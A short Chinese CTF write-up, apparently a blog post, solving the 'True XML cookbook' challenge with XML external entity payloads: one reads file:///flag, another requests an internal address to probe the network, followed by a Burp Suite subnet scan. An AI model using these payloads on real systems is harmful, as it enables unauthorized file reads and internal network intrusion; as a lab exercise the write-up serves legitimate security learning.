True XML cookbook

worker..2024-08-26 1:38

打开题目

看到登录口

随便输入admin,123456,然后抓包试一下

先按原来那道题的payload进行测试,payload和结果如下:

<?xml version="1.0" ?>

<!DOCTYPE llw [

<!ENTITY file SYSTEM "file:///flag">

]>

<user>

<username>&file;</username>

<password>1</password>

</user>

未成功获取到flag信息,试着探测内网信息,读取下系统内的配置文件信息看是否能发现有用的信息

这里获得一个新的地址,尝试下进行连接结果如下:

<?xml version="1.0" ?>

<!DOCTYPE llw [

<!ENTITY file SYSTEM "http://10.244.80.49/">

]>

<user>

<username>&file;</username>

<password>1</password>

</user>

连接失败,那就查询下同网段内存在不存在其他地址,使用bp的爆破模块进行爆破,设置如下:

扫描可得到flag

相关推荐
java1234_小锋2 天前
MyBatis中XML映射有哪些标签?
xml·tomcat·mybatis
大腕先生2 天前
通用分页超详细介绍(附带源代码解析&页面展示效果)
xml·java·linux·服务器·开发语言·前端·idea
许彰午5 天前
Spring Boot + Vue 实现 XML 动态表单:固定字段 + 自由扩展方案
xml·vue.js·spring boot
untE EADO5 天前
Tomcat的server.xml配置详解
xml·java·tomcat
zuowei28896 天前
spring实例化对象的几种方式(使用XML配置文件)
xml·java·spring
weixin_520649876 天前
xml json ini 文件语法
xml·java·json
Full Stack Developme6 天前
Hutool XML 操作教程
xml·windows·python
阿亮爱学代码8 天前
初识Android界面布局
android·xml·view·viewgroup
eSsO KERF9 天前
使用 Logback 的最佳实践:`logback.xml` 与 `logback-spring.xml` 的区别与用法
xml·spring·logback
热门推荐
01GitHub 镜像站点02近期有什么ai的新消息,新动态? 2026.4月032026年4月AI大事件深度解读:大模型竞争进入“深水区“042026年AI前瞻:量子AI、具身智能与科学发现的新纪元05在Windows 11上安装Docker的踩坑记录06Codex 接入 DeepSeek API 完整配置文档07codex app每次打开重连5次Reconnecting问题解决082026年4月技术前沿:AI大模型爆发、智能体革命与量子安全新纪元09DeepSeek V4 全面解析:测评、对比、案例及实操指南102026年AI编程工具终极横评:Cursor vs Claude Code vs Copilot